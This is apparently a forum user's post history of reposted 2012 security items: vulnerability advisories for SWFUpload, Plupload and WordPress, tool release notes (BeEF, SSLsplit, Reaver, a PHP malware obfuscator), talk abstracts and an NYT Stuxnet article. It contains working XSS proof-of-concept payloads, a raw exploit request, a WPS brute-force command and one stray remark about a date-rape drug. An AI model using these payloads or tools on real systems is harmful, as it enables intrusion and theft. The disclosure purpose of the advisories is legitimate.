Everything posted by Nytro
-
[h=2]XSS and CSRF via SWF Applets (SWFUpload, Plupload)[/h]

Via: Defcamp

[h=3]Summary[/h]

Nathan Partlan and I discovered and reported vulnerabilities in two common Flash applets, SWFUpload and Plupload. SWFUpload's developers have not released a fix for the XSS issue identified. Plupload's developers have released v1.5.4 to address the identified CSRF issue. Both of these applets are present in WordPress installations. These vulnerabilities were addressed as part of WordPress 3.3.2.

[h=3]Vulnerability #1: XSS in SWFUpload[/h]

The latest version of SWFUpload (ActionScript code available here) contains the following code:

```actionscript
// Get the movie name
this.movieName = root.loaderInfo.parameters.movieName;

// **Configure the callbacks**
// The JavaScript tracks all the instances of SWFUpload on a page. We can access the instance
// associated with this SWF file using the movieName. Each callback is accessible by making
// a call directly to it on our instance. There is no error handling for undefined callback functions.
// A developer would have to deliberately remove the default functions, set the variable to null, or remove
// it from the init function.
this.flashReady_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].flashReady";
this.fileDialogStart_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].fileDialogStart";
this.fileQueued_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].fileQueued";
this.fileQueueError_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].fileQueueError";
this.fileDialogComplete_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].fileDialogComplete";
this.uploadStart_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].uploadStart";
this.uploadProgress_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].uploadProgress";
this.uploadError_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].uploadError";
this.uploadSuccess_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].uploadSuccess";
this.uploadComplete_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].uploadComplete";
this.debug_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].debug";
this.testExternalInterface_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].testExternalInterface";
this.cleanUp_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].cleanUp";
this.buttonAction_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].buttonAction";
```

Each of those callbacks is used as the first parameter to ExternalInterface.call, which executes JavaScript in the context of the current page. Since movieName is derived from user input (a Flash parameter) and a Flash applet can be loaded directly (with parameters in the URL), the Flash applet allows for reflected cross-site scripting. For sites where the applet is hosted on the same domain as the main website, this is a serious security concern. At this point, I'm not aware of a patched version of the applet source (let me know in the comments if there is one!). My suggestion would be to filter the movieName parameter so that only alpha-numeric characters are allowed.

Proof of Concept:

http://demo.swfupload.org/v220/swfupload/swfupload.swf?movieName=%22]%29;%7Dcatch%28e%29%7B%7Dif%28%21self.a%29self.a=%21alert%281%29;//

[h=3]Vulnerability #2: CSRF in Plupload[/h]

The Plupload applet called Security.allowDomain('*') to allow the applet to be used from any domain (so it could be served from S3, for instance). That meant people could interact with the Plupload applet from any other site on the Internet by embedding it on a page and using JavaScript. But due to the way the same-origin policy works in Flash, the applet could still make requests back to the domain on which it was hosted. In addition, people can specify the full URL for an upload request via JavaScript and the result of that request (i.e. the HTML of the resulting page) is passed back via JavaScript to the embedding page.

So, if an attacker could convince a target to interact with the applet (by selecting a single file to be uploaded), the attacker could make a request to the domain that the applet was hosted on and read back the full response. That could disclose CSRF tokens or other sensitive information. This issue was especially important for WordPress installations, where Plupload applets are hosted inside of the wp-includes directory by default. The issue was resolved by removing the call to Security.allowDomain('*') by default.

[h=3]Conclusion[/h]

Third-party Flash applets are vulnerable to many of the same sorts of attacks as other parts of web applications. However, they are often included in sites without a proper understanding of the security risks.

Source: https://nealpoole.com/blog/2012/05/xss-and-csrf-via-swf-applets-swfupload-plupload/
-
Carbylamine - A PHP Script Encoder to 'Obfuscate/Encode' PHP Files

Posted by FlashcRew at 14:33
Via: Defcamp

Carbylamine PHP Encoder is a PHP encoder to 'obfuscate/encode' PHP files, a faster way to encode your malware offline.

How to use: carbylamine.php

Download carbylamine

The project's home page is here.

Source: Carbylamine - A PHP Script Encoder to 'Obfuscate/Encode' PHP Files | fLaShcRew
-
[h=2]Wireshark: Listening to VoIP Conversations from Packet Captures[/h]

Author: D. Dieterle, May 21, 2012.

I have never done a lot with "Voice over IP" or VoIP systems, but ran into this today and thought it was pretty cool. A lot of telephones and communication devices now use VoIP to communicate over the internet. I was wondering how hard it would be to listen to a VoIP phone call if you had a packet capture that included the call. How hard would it be, I wondered, to scan a packet capture, find the calls and be able to somehow listen to the call. Well, come to find out, it is not hard at all. The feature is built into Wireshark! And they also include a file capture on their website so you can try it out. So... Let's do it!

1. Download the sample capture from Wireshark's website.
2. Run Wireshark and open the packet capture.
3. Now all you need to do is go to the menu bar, select "Telephony" and then "VoIP Calls".
4. A list of calls from the packet capture will show up. Pick the one you want to listen to; in this sample the first one is the only one that really has a conversation.
5. Easy peasy: just select the call you want, click "Player" then "Decode".
6. The player screen shows up and shows the waveforms of the conversation. You will have two, one for each side of the call. You can listen to each side individually, or if you tick both check boxes you can listen to the conversation as it plays out.

That's it: if the VoIP conversation is in a protocol that Wireshark understands, and is not encrypted, you can very simply isolate the call and listen to it via Wireshark.

As always, do not try these techniques on a network or on systems that you do not have permission to do so. Also, check your local laws regarding communication privacy and telephony before trying something like this in real life.

Source: Wireshark: Listening to VoIP Conversations from Packet Captures
-
Lame; better look up GHB (the date-rape drug) yourselves.
-
Bsides London 2012 David Rook: Windows Phone 7 platform and application security overview

David Rook, aka @SecurityNinja, gives an overview of the Windows Phone 7 platform and application security at Security BSides London 2012 at the Barbican. The slides can be seen here: SecurityBSides London - windows phone 7
-
[h=1]Gavin Ewan - A salesman's guide to social engineering[/h]

At Bsides London 2012, Gavin Ewan gives a Salesman's Guide to Social Engineering. Slides are available at: bit.ly/J3rVck

Thanks to our media sponsors, Twist & Shout, for recording our video on the day.
-
[h=1]Arron "Finux" Finnon[/h] At Bsides London 2012, Arron "Finux" Finnon presents UPnP - The Useful plug and pwn protocol - revisited
-
[h=1]Bsides London 2012, Robin Wood - "Breaking into Security"[/h] At Security Bsides London 2012, Robin (@digininja) Wood answers the oft-asked question of, "How do I get into information security" or "how do I become a pen tester" Videos thanks to our media sponsors Twist & Shout
-
[h=1]BeEF 0.4.3.5![/h]

by Mayuresh on June 5, 2012

Our first post regarding BeEF can be found here. A few hours ago, an updated version – BeEF version 0.4.3.5 – was made available to us!

"BeEF, the Browser Exploitation Framework is a professional security tool provided for lawful research and testing purposes. It allows the experienced penetration tester or system administrator additional attack vectors when assessing the posture of a target. The user of BeEF will control which browser will launch which exploit and at which target. BeEF hooks one or more web browsers as beachheads for the launching of directed exploits in real-time. Each browser is likely to be within a different security context. This provides additional vectors that can be exploited by security professionals. BeEF provides an easily integratable framework that demonstrates the impact of browser and Cross-site Scripting issues in real-time. Development has focused on creating a modular framework. This has made module development a very quick and simple process. Current modules include Metasploit, port scanning, keylogging, TOR detection and more."

[h=2]Changes made to BeEF 0.4.3.5:[/h]

- Experimental support for WebSockets as an alternative communication channel has been added. The server-side handlers are event-based for performance reasons, and right now it works smoothly in the latest Chrome/Safari and Firefox versions. To give it a try, set beef.http.websocket.enable to true in the main config.yaml file. Using WebSockets the communication is much faster, especially when dealing with large requests (Tunneling Proxy) or a high number of command modules. The WebSockets work is a joint effort between Graziano Felline and Michele.
- Experimental support for obfuscation has also been added. It is disabled by default; enable the extension at beef.extension.evasion.enable at the end of the main config.yaml file if you want to play with it. The purpose of the extension is to reduce the likelihood that the BeEF hook will be detected by regexes and Layer 7 filters. Obviously a manual analysis (a la sla.ckers) will reveal the goodness, but still the extension enables you to combine and chain multiple techniques as you like. Right now, when enabled, the main hook file and the code sent with modules is scrambled (random string substitution), minified and base64'ed.
- A couple of XSRF modules for the Huawei SmartAX MT880 router and the D-Link DCS series camera were added.
- The Deface Web Page module was updated to change the page title and favicon.
- The first BeEF clickjacking module, which can be used as a template for more specific attacks: an invisible iframe follows the mouse cursor. Right now this works in Firefox and Chrome, but not yet in Internet Explorer.
- A Cross-Site Printing (XSP) module that allows you to print to printers with port 9100 open has also been added. By default, this prints BeEF ASCII art.
- As with the social engineering modules, a module that prompts the user to install a fake Flash Player update which is really a malicious Chrome extension has also been added. This is very nice because the extension can issue cross-domain requests, has access to tabs, and can be the launch point for other modules: inject BeEF in all tabs, steal Google contacts, or a new one Mike added recently to steal all cookies from all tabs, including those marked with the HttpOnly flag.
- A Mobile Safari iOS 5.1 address bar spoofing module, the Glassfish WAR upload module through XSRF, the frame sniffing module using LeakyFrame, the Heretic Clippy code and a Netgear GS108T managed switch XSRF module have also been added.

All thanks to Bart Leppens, Nick Freeman, Denis Andzakovic, Christian Frichot, Mike Haworth, Brendan and Antisnatchor!

[h=3]Download BeEF 0.4.3.5:[/h]

BeEF 0.4.3.5 - beef-latest-alpha.tar.gz/beef-0.4.3.5.zip – https://github.com/beefproject/beef/zipball/beef-0.4.3.5

Source: BeEF version 0.4.3.5! | PenTestIT
-
Science of Cyber-Security

JASON, The MITRE Corporation, 7515 Colshire Drive, McLean, Virginia 22102-7508 (703)
Contact: D. McMorrow - dmcmorrow@mitre.org
November 2010
Approved for public release; distribution unlimited

Contents

1 EXECUTIVE SUMMARY
2 PROBLEM STATEMENT AND INTRODUCTION
3 CYBER-SECURITY AS SCIENCE – An Overview
  3.1 Attributes for Cyber-Security
  3.2 Guidance from other Sciences
    3.2.1 Economics
    3.2.2 Meteorology
    3.2.3 Medicine
    3.2.4 Astronomy
    3.2.5 Agriculture
  3.3 Security Degrades Over Time
    3.3.1 Unix passwords
    3.3.2 Lock bumping
  3.4 The Role of Secrecy
  3.5 Aspects of the Science of Cyber-Security
  3.6 Some Science
    3.6.1 Trust
    3.6.2 Cryptography
    3.6.3 Game theory
    3.6.4 Model checking
    3.6.5 Obfuscation
    3.6.6 Machine learning
    3.6.7 Composition of components
  3.7 Applying the Fruits of Science
  3.8 Metrics
  3.9 The Opportunities of New Technologies
  3.10 Experiments and Data
4 MODEL CHECKING
  4.1 Brief Introduction to Spin and Promela
  4.2 Application to Security
    4.2.1 The Needham-Schroeder Protocol
    4.2.2 Promela model of the protocol
  4.3 Scaling Issues
  4.4 Extracting Models from Code
  4.5 Relationship to Hyper-Properties
5 THE IMMUNE SYSTEM ANALOGY
  5.1 Basic Biology
  5.2 Learning from the Analogy
    5.2.1 The need for adaptive response
    5.2.2 A mix of sensing modalities
    5.2.3 The need for controlled experiments
    5.2.4 Time scale differences
    5.2.5 Responses to detection
    5.2.6 Final points
6 CONCLUSIONS AND RECOMMENDATIONS
A APPENDIX: Briefers

Download: http://www.fas.org/irp/agency/dod/jason/cyber.pdf
-
Firefox 13

[h=1]Firefox Has a Redesigned Home Page and New Tab Experience That Make Browsing the Web Faster and Easier[/h]

June 5th, 2012 · Firefox

Firefox makes it faster and easier to get where you want to go on the Web with a redesigned Home Page and New Tab experience. The Home Page now includes icons at the bottom of the page to give you easy access to bookmarks, history, settings, add-ons, downloads and sync preferences with one-click shortcuts. When you open a new tab, you'll see thumbnails of your most recently and frequently visited sites. You can customize the New Tab page by adding or removing thumbnails based on where you go most. Click the screenshot to learn more!

Firefox loads tabs on demand when restoring a browsing session to more quickly get you to Web pages. Firefox first loads the tab you are currently viewing, then loads background tabs when you click them. It's an improvement that makes Firefox start faster and use less memory. This is just one of a series of performance improvements to Firefox responsiveness.

Firefox supports SPDY by default to make browsing faster and more secure. SPDY is a protocol designed as a successor to HTTP that reduces the amount of time it takes for websites to load. You will notice faster page load times on sites that support SPDY networking, like Google and Twitter.

Firefox 13 also adds a Khmer locale; with this support, Firefox is available to an estimated 15 million native Khmer speakers around the world, in addition to the millions that already use Firefox in more than 85 languages worldwide.

For more information: Download Firefox for Windows, Mac and Linux; Firefox for Windows, Mac and Linux detailed release notes

Source: Firefox Has a Redesigned Home Page and New Tab Experience That Make Browsing the Web Faster and Easier | The Mozilla Blog
-
SSLsplit - Transparent and Scalable SSL/TLS Interceptor

SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. It terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing.

SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both IPv4 and IPv6. For SSL and HTTPS connections, it generates and signs forged X509v3 certificates on the fly, based on the original server certificate's subject DN and subjectAltName extension. SSLsplit fully supports Server Name Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and ECDHE cipher suites. It can also use existing certificates for which the private key is available, instead of generating forged ones. SSLsplit supports NULL-prefix CN certificates and can deny OCSP requests in a generic way.

SSLsplit supports a number of NAT engines, static forwarding and SNI DNS lookups to determine the original destination of redirected connections. SSLsplit currently supports the following NAT engines:

- OpenBSD packet filter (pf) – also available on FreeBSD and NetBSD
- FreeBSD IP firewall (IPFW) – also available on Mac OS X
- IPFilter (ipfilter, ipf), available on many systems, including FreeBSD, NetBSD, Linux and Solaris
- Linux netfilter (netfilter)
- Linux netfilter using the iptables TPROXY target (tproxy)

Download SSLsplit 0.4.4

Source: SSLsplit - Transparent and Scalable SSL/TLS Interceptor | Security, Hacking and Penetration Testing Tools
-
Reaver v1.4 - WPS Brute force attack against Wifi

The WiFi Protected Setup protocol is vulnerable to a brute force attack that allows an attacker to recover an access point's WPS PIN, and subsequently the WPA/WPA2 passphrase, in just a matter of hours.

Screenshot: http://2.bp.blogspot.com/-x1sTEFZqpvU/T85ITbIGQ3I/AAAAAAAAGfE/Dqh7dgJUGvY/s1600/Reaver+v1.4+-+WPS+Brute+force+attack+against+Wifi.jpg

Usage is simple; just specify the target BSSID and the monitor mode interface to use:

```
# reaver -i mon0 -b 00:01:02:03:04:05
```

For those interested, there is also a commercial version available with more features and speed improvements. On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS PIN and recover the passphrase.

Download Reaver v1.4

Source: SSLsplit - Transparent and Scalable SSL/TLS Interceptor | Security, Hacking and Penetration Testing Tools
-
Windows 7, powerful malware, "open-source", Fully UnDetectable: PowerShell
-
WordPress 3.3.2 Cross Site Scripting

Authored by old man

WordPress version 3.3.2 suffers from a double-encoding cross site scripting vulnerability that bypasses the filter for protection.

There is a persistent XSS vulnerability in WordPress version 3.3.2. However, the severity of this finding is very LOW. The details are as follows:

a) Log into an admin account.
b) Navigate to Links -> Link Categories.
c) Fill in the required details and intercept the request with Burp Suite.
d) The injectable parameter is slug. If you inject <script>alert(1)</script> as the value of the parameter "slug", the application strips it and the value becomes alert1. But if the payload is double-encoded ;-) <script>alert(1)</script>, when converted to %253cscript%253ealert%25281%2529%253c%252fscript%253e, bypasses the XSS protection.

The following is the raw Burp request; the vulnerable parameter is slug and the payload is its value.

```http
POST /wordpress/wp-admin/edit-tags.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/wordpress/wp-admin/edit-tags.php?action=edit&taxonomy=link_category&tag_ID=2&post_type=post
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1335544051%7C197b22093eaefaf6950bd81d6aa6372b; wp-settings-time-1=1335371272; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1335544051%7C6ebcb9d0104a37c6d7a91274ac94c6cb
Content-Type: application/x-www-form-urlencoded
Content-Length: 379

action=editedtag&tag_ID=2&taxonomy=link_category&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit-tags.php%3Ftaxonomy%3Dlink_category&_wpnonce=83974d7f8f&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fedit-tags.php%3Faction%3Dedit%26taxonomy%3Dlink_category%26tag_ID%3D2%26post_type%3Dpost&name=Blogroll&slug=injecthere%253cscript%253ealert%25281%2529%253c%252fscript%253e&description=sectest&submit=Update
```

Source: WordPress 3.3.2 Cross Site Scripting | Packet Storm
-
Yes, maybe; those are the kind of people I idolize.
-
[h=1]nullcon Goa 2012: HaxdroiD Empowering Handsets - By Anant & Pardhu[/h]

As recent trends have already shown, the next wave will be mobile computing, and with it the platform for penetration testing will shift as well. Although Android is targeted as the next-generation computing platform, it still lacks the capability to perform VA/PT/ethical hacking on it. If we look at the Android market we find it lacking in many respects: not much of a tool set is available, and not much documentation is available online either. This paper will discuss various options that are available for converting an innocent Android handset into a penetration testing platform. The talk will evaluate the current scenario and also present the various options that are available. Beyond the existing tool set, we will also be exploring ways and means to explore and exploit the Android platform to its limits. We will also be publishing a customized Android ROM which is a direct attack platform. It will have an advanced feature set pre-configured and ready to use, saving security researchers a large amount of effort. (This ROM will be published for two different handset models; however, it will have options to be ported to just about any handset/tablet which can handle the load.)

Source: nullOxOO - YouTube
-
[h=1]nullcon Goa 2012: Attacking Backup Software - By Nibin Varghese[/h]

Backup software is a valuable asset for any organization. This software runs on a large number of systems in an enterprise. Its main functionality is to provide backup and recovery options for the critical data that belongs to the enterprise. The hosts requiring these backup services communicate with a backup server over the network. The different modes of operation between the server and client are a pull model, where the server connects to the client, or a push model, where the client connects to the server. If the communication between the server and client is not validated properly, there are different attack vectors that can be used against this software. This paper explains an attack on Symantec backup software (CVE-2011-0546, BID:47824) where it was possible to perform a man-in-the-middle attack to steal information from host machines. The bug was very critical and complex, as it affected a major architectural flaw of the application in how it validated the host machines before a backup operation was initiated.

Source: nullOxOO - YouTube
-
[h=1]nullcon Goa 2012: IVR Security Internal Network Attacks via Phone - By Rahul Sasi[/h]

The following research is on IVR (Interactive Voice Response) systems, which are currently used in phone banking, call centers, hospitals and corporations, mainly for information retrieval and remote management via telephone lines. The paper explains a series of security issues concerning these (IVR) systems, exploitation techniques, and ways of carrying out attacks on the internal network via telephone lines. A demonstration of a few exploits on IVR systems and a real incident about a critical, responsibly disclosed flaw in a bank's phone banking system will be given.

Source: nullOxOO - YouTube
-
[h=1]nullcon Goa 2012: Binary God - By Atul Alex[/h]

The talk is about an abstract processor named Aod8 designed by Atul. The idea is to emulate an abstract design at the programming level. The objective of this research was to understand the basics of designing a processor architecture, creating a custom assembler for this architecture to write programs for it, writing your own debugger, and creating a very basic operating system for it. The speaker will be demonstrating the tools that he has created for the same, explaining how he wrote the operating system, the idea behind writing the debugger and the assembler, and concepts of handling memory and bypassing the size limitations of the architecture.

Source: nullOxOO - YouTube
-
[h=1]nullcon Goa 2012: Attacking and Defending the Smart Grid - By Justin Searle[/h]

The Smart Grid brings greater benefits for electric utilities and customers alike; however, these benefits come at a cost from a security perspective. Unlike the over-hyped messages we usually hear from the media, the sky is NOT falling. However, just like any other technology, the systems and devices that make up the Smart Grid will have weaknesses and vulnerabilities. It is important for us to understand these vulnerabilities, how they can be attacked, and what we need to do to defend against those attacks. This presentation will explore the architecture of most smart meters, explain the methodologies developed to perform penetration testing on them, enumerate the types of vulnerabilities we commonly find, and discuss the solutions/recommendations.

Source: nullOxOO - YouTube
-
Interesting: http://www.nytimes.com/interactive/2012/06/01/world/middleeast/how-a-secret-cyberwar-program-worked.html?src=tp
-
[h=1]Obama Order Sped Up Wave of Cyberattacks Against Iran[/h][h=6]By DAVID E. SANGER[/h] [h=6]Published: June 1, 2012[/h] WASHINGTON — From his first months in office, President Obama secretly ordered increasingly sophisticated attacks on the computer systems that run Iran’s main nuclear enrichment facilities, significantly expanding America’s first sustained use of cyberweapons, according to participants in the program. Mr. Obama decided to accelerate the attacks — begun in the Bush administration and code-named Olympic Games — even after an element of the program accidentally became public in the summer of 2010 because of a programming error that allowed it to escape Iran’s Natanz plant and sent it around the world on the Internet. Computer security experts who began studying the worm, which had been developed by the United States and Israel, gave it a name: Stuxnet. At a tense meeting in the White House Situation Room within days of the worm’s “escape,” Mr. Obama, Vice President Joseph R. Biden Jr. and the director of the Central Intelligence Agency at the time, Leon E. Panetta, considered whether America’s most ambitious attempt to slow the progress of Iran’s nuclear efforts had been fatally compromised. “Should we shut this thing down?” Mr. Obama asked, according to members of the president’s national security team who were in the room. Told it was unclear how much the Iranians knew about the code, and offered evidence that it was still causing havoc, Mr. Obama decided that the cyberattacks should proceed. In the following weeks, the Natanz plant was hit by a newer version of the computer worm, and then another after that. The last of that series of attacks, a few weeks after Stuxnet was detected around the world, temporarily took out nearly 1,000 of the 5,000 centrifuges Iran had spinning at the time to purify uranium. 
This account of the American and Israeli effort to undermine the Iranian nuclear program is based on interviews over the past 18 months with current and former American, European and Israeli officials involved in the program, as well as a range of outside experts. None would allow their names to be used because the effort remains highly classified, and parts of it continue to this day.

These officials gave differing assessments of how successful the sabotage program was in slowing Iran’s progress toward developing the ability to build nuclear weapons. Internal Obama administration estimates say the effort was set back by 18 months to two years, but some experts inside and outside the government are more skeptical, noting that Iran’s enrichment levels have steadily recovered, giving the country enough fuel today for five or more weapons, with additional enrichment.

Whether Iran is still trying to design and build a weapon is in dispute. The most recent United States intelligence estimate concludes that Iran suspended major parts of its weaponization effort after 2003, though there is evidence that some remnants of it continue.

Iran initially denied that its enrichment facilities had been hit by Stuxnet, then said it had found the worm and contained it. Last year, the nation announced that it had begun its own military cyberunit, and Brig. Gen. Gholamreza Jalali, the head of Iran’s Passive Defense Organization, said that the Iranian military was prepared “to fight our enemies” in “cyberspace and Internet warfare.” But there has been scant evidence that it has begun to strike back.

The United States government only recently acknowledged developing cyberweapons, and it has never admitted using them. There have been reports of one-time attacks against personal computers used by members of Al Qaeda, and of contemplated attacks against the computers that run air defense systems, including during the NATO-led air attack on Libya last year.

But Olympic Games was of an entirely different type and sophistication. It appears to be the first time the United States has repeatedly used cyberweapons to cripple another country’s infrastructure, achieving, with computer code, what until then could be accomplished only by bombing a country or sending in agents to plant explosives.

The code itself is 50 times as big as the typical computer worm, Carey Nachenberg, a vice president of Symantec, one of the many groups that have dissected the code, said at a symposium at Stanford University in April. Those forensic investigations into the inner workings of the code, while picking apart how it worked, came to no conclusions about who was responsible.

A similar process is now under way to figure out the origins of another cyberweapon called Flame that was recently discovered to have attacked the computers of Iranian officials, sweeping up information from those machines. But the computer code appears to be at least five years old, and American officials say that it was not part of Olympic Games. They have declined to say whether the United States was responsible for the Flame attack.

Mr. Obama, according to participants in the many Situation Room meetings on Olympic Games, was acutely aware that with every attack he was pushing the United States into new territory, much as his predecessors had with the first use of atomic weapons in the 1940s, of intercontinental missiles in the 1950s and of drones in the past decade.

He repeatedly expressed concerns that any American acknowledgment that it was using cyberweapons — even under the most careful and limited circumstances — could enable other countries, terrorists or hackers to justify their own attacks. “We discussed the irony, more than once,” one of his aides said. Another said that the administration was resistant to developing a “grand theory for a weapon whose possibilities they were still discovering.”

Yet Mr. Obama concluded that when it came to stopping Iran, the United States had no other choice. If Olympic Games failed, he told aides, there would be no time for sanctions and diplomacy with Iran to work. Israel could carry out a conventional military attack, prompting a conflict that could spread throughout the region.

[h=3]A Bush Initiative[/h]

The impetus for Olympic Games dates from 2006, when President George W. Bush saw few good options in dealing with Iran. At the time, America’s European allies were divided about the cost that imposing sanctions on Iran would have on their own economies. Having falsely accused Saddam Hussein of reconstituting his nuclear program in Iraq, Mr. Bush had little credibility in publicly discussing another nation’s nuclear ambitions.

The Iranians seemed to sense his vulnerability, and, frustrated by negotiations, they resumed enriching uranium at an underground site at Natanz, one whose existence had been exposed just three years before. Iran’s president, Mahmoud Ahmadinejad, took reporters on a tour of the plant and described grand ambitions to install upward of 50,000 centrifuges.

For a country with only one nuclear power reactor — whose fuel comes from Russia — to say that it needed fuel for its civilian nuclear program seemed dubious to Bush administration officials. They feared that the fuel could be used in another way besides providing power: to create a stockpile that could later be enriched to bomb-grade material if the Iranians made a political decision to do so.

Hawks in the Bush administration like Vice President Dick Cheney urged Mr. Bush to consider a military strike against the Iranian nuclear facilities before they could produce fuel suitable for a weapon. Several times, the administration reviewed military options and concluded that they would only further inflame a region already at war, and would have uncertain results.

For years the C.I.A. had introduced faulty parts and designs into Iran’s systems — even tinkering with imported power supplies so that they would blow up — but the sabotage had had relatively little effect.

General James E. Cartwright, who had established a small cyberoperation inside the United States Strategic Command, which is responsible for many of America’s nuclear forces, joined intelligence officials in presenting a radical new idea to Mr. Bush and his national security team. It involved a far more sophisticated cyberweapon than the United States had designed before.

The goal was to gain access to the Natanz plant’s industrial computer controls. That required leaping the electronic moat that cut the Natanz plant off from the Internet — called the air gap, because it physically separates the facility from the outside world. The computer code would invade the specialized computers that command the centrifuges.

The first stage in the effort was to develop a bit of computer code called a beacon that could be inserted into the computers, which were made by the German company Siemens and an Iranian manufacturer, to map their operations. The idea was to draw the equivalent of an electrical blueprint of the Natanz plant, to understand how the computers control the giant silvery centrifuges that spin at tremendous speeds. The connections were complex, and unless every circuit was understood, efforts to seize control of the centrifuges could fail.

[...]

Full article: http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html?_r=1
